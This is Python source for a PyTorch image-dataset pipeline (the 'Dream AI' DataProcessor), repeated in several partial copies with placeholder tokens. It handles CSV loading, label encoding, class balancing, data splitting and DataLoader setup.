self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\n<function token>\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n 
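# right-align the box coordinates in each row, padding missing leading\n                # entries with zeros so zero_targets stays rectangular.\n                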
zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 
'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n 
data_dfs[self.tr_name], temp_tfms)\n        self.img_mean, self.img_std = get_img_stats(temp_dataset,\n            stats_percentage)\n        data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n            -1].std = self.img_mean, self.img_std\n        data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n            ][-1].std = self.img_mean, self.img_std\n        data_transforms[self.test_name][-1].mean, data_transforms[self.\n            test_name][-1].std = self.img_mean, self.img_std\n        if balance:\n            image_datasets = {x: dataset(os.path.join(data_dir, self.\n                tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n                class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n                val_name, self.test_name]}\n        else:\n            image_datasets = {x: dataset(os.path.join(data_dir, self.\n                tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n                self.tr_name, self.val_name, self.test_name]}\n        dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n            batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n            [self.tr_name, self.val_name, self.test_name]}\n        dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n            self.val_name, self.test_name]}\n        self.image_datasets, self.dataloaders, self.dataset_sizes = (\n            image_datasets, dataloaders, dataset_sizes)\n        return image_datasets, dataloaders, dataset_sizes\n\n    def imshow(self, inp, title=None):\n        \"\"\"Imshow for Tensor.\"\"\"\n        inp = self.denorm_img(inp)\n        plt.imshow(inp)\n        if title:\n            plt.title(title)\n        plt.pause(0.001)\n\n    def denorm_img(self, inp, calculate=False):\n        inp = inp.numpy().transpose((1, 2, 0))\n        if calculate:\n            mean = np.mean(inp)\n            std = np.std(inp)\n        else:\n            mean = self.img_mean.numpy()\n            std = self.img_std.numpy()\n        inp = std * inp + mean\n        inp = np.clip(inp, 0, 1)\n        return inp\n\n    def show_data(self, folder_name='train', size=(64, 64), bs=5):\n        self.get_data(s=size, bs=bs)\n        batch = next(iter(self.dataloaders[folder_name]))\n        inputs, classes = batch[0], batch[1]\n        out = torchvision.utils.make_grid(inputs)\n        if self.reg:\n            print(classes)\n            self.imshow(out, title=[x for x in classes])\n        elif self.multi_label:\n            self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n                torch.LongTensor))] for x in classes])\n        else:\n            self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n    def __init__(self, data_dir, data, transforms_=None, obj=False,\n        minorities=None, diffs=None, bal_tfms=None):\n        self.data_dir = data_dir\n        self.data = data\n        self.transforms_ = transforms_\n        self.tfms = None\n        self.obj = obj\n        self.minorities = minorities\n        self.diffs = diffs\n        self.bal_tfms = bal_tfms\n        assert transforms_ is not None, print('Please pass some transforms.')\n\n    def __len__(self):\n        return len(self.data)\n\n    def __getitem__(self, index):\n        img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n        img = Image.open(img_path)\n        img = img.convert('RGB')\n        img = torchvision.transforms.functional.to_grayscale(img,\n            num_output_channels=3)\n        y = self.data.iloc[index, 1]\n        if self.minorities and self.bal_tfms:\n            if y in self.minorities:\n                if hasattr(self.bal_tfms, 'transforms'):\n                    for tr in self.bal_tfms.transforms:\n                        tr.p = self.diffs[y]\n                    l = [self.bal_tfms]\n                    l.extend(self.transforms_)\n                    self.tfms = transforms.Compose(l)\n                else:\n                    for t in self.bal_tfms:\n                        t.p = self.diffs[y]\n                    self.transforms_[1:1] = self.bal_tfms\n                    self.tfms = transforms.Compose(self.transforms_)\n            else:\n                self.tfms = transforms.Compose(self.transforms_)\n        else:\n            self.tfms = transforms.Compose(self.transforms_)\n        x = self.tfms(img)\n        if self.obj:\n            s = x.size()[1]\n            if isinstance(s, tuple):\n                s = s[0]\n            row_scale = s / img.size[0]\n            col_scale = s / img.size[1]\n            y = rescale_bbox(y, row_scale, col_scale)\n            y.squeeze_()\n            y2 = self.data.iloc[index, 2]\n            y = y, y2\n        return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n    def __init__(self, root, transform=None, target_transform=None, loader=\n        default_loader, minorities=None, diffs=None, bal_tfms=None,\n        tta_tfms=None):\n        super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n            transform=transform, target_transform=target_transform)\n        self.imgs = self.samples\n        self.minorities = minorities\n        self.diffs = diffs\n        self.bal_tfms = bal_tfms\n        self.tta_tfms = tta_tfms\n        self.tfms = None\n\n    def __getitem__(self, index):\n        path, target = self.samples[index]\n        sample = self.loader(path)\n        if self.transform:\n            if self.minorities and self.bal_tfms:\n                if target in self.minorities:\n                    if hasattr(self.bal_tfms, 'transforms'):\n                        for tr in self.bal_tfms.transforms:\n                            tr.p = self.diffs[target]\n                        l = [self.bal_tfms]\n                        l.extend(self.transform)\n                        self.tfms = transforms.Compose(l)\n                    else:\n                        for t in self.bal_tfms:\n                            t.p = self.diffs[target]\n                        self.tfms = transforms.Compose(self.bal_tfms + self\n                            .transform)\n                else:\n                    self.tfms = transforms.Compose(self.transform)\n            elif self.tta_tfms:\n                self.tfms = self.tta_tfms\n            else:\n                self.tfms = transforms.Compose(self.transform)\n            sample = self.tfms(sample)\n        if self.target_transform:\n            target = self.target_transform(target)\n        return sample, target\n\n\n<function token>\n<function token>\n\n\ndef get_minorities(df, thresh=0.8):\n    c = df.iloc[:, 1].value_counts()\n    lc = list(c)\n    max_count = lc[0]\n    diffs = [(1 - x / max_count) for x in lc]\n    diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n    minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n        max_count]\n    return minorities, diffs\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n    def __init__(self, 
self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = 
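# Worked example of the get_minorities logic defined above: any class whose
# count falls below thresh * max_count is flagged, and diff = 1 - count/max
# later becomes the probability p of the balancing transforms. Toy frame
# below is illustrative (column 1 holds the labels, as in the module).
import pandas as pd

df = pd.DataFrame({'file': ['a.jpg', 'b.jpg', 'c.jpg', 'd.jpg'],
                   'label': ['cat', 'cat', 'cat', 'dog']})
counts = df.iloc[:, 1].value_counts()            # cat: 3, dog: 1 (descending)
diffs = {k: (1 - v / counts.iloc[0]) for k, v in counts.items()}
minorities = [k for k, v in counts.items() if v < 0.8 * counts.iloc[0]]
print(minorities, diffs)                         # ['dog'] {'cat': 0.0, 'dog': 0.75}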
train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in 
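# Standalone illustration of the target-padding scheme used by the detection
# and regression branches of set_up_data above: each variable-length target
# is right-aligned into a zero-padded row of width max(lengths) via
#   t[len(t) - len(target):] = target
import numpy as np
import torch

targets = [[1.0, 2.0], [3.0, 4.0, 5.0, 6.0]]
width = max(len(t) for t in targets)
padded = np.zeros((len(targets), width))
for i, t in enumerate(targets):
    padded[i, width - len(t):] = t               # left-pad with zeros
rows = [torch.from_numpy(r).float() for r in padded]
print(padded)                                    # [[0. 0. 1. 2.] [3. 4. 5. 6.]]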
list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n 
self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n 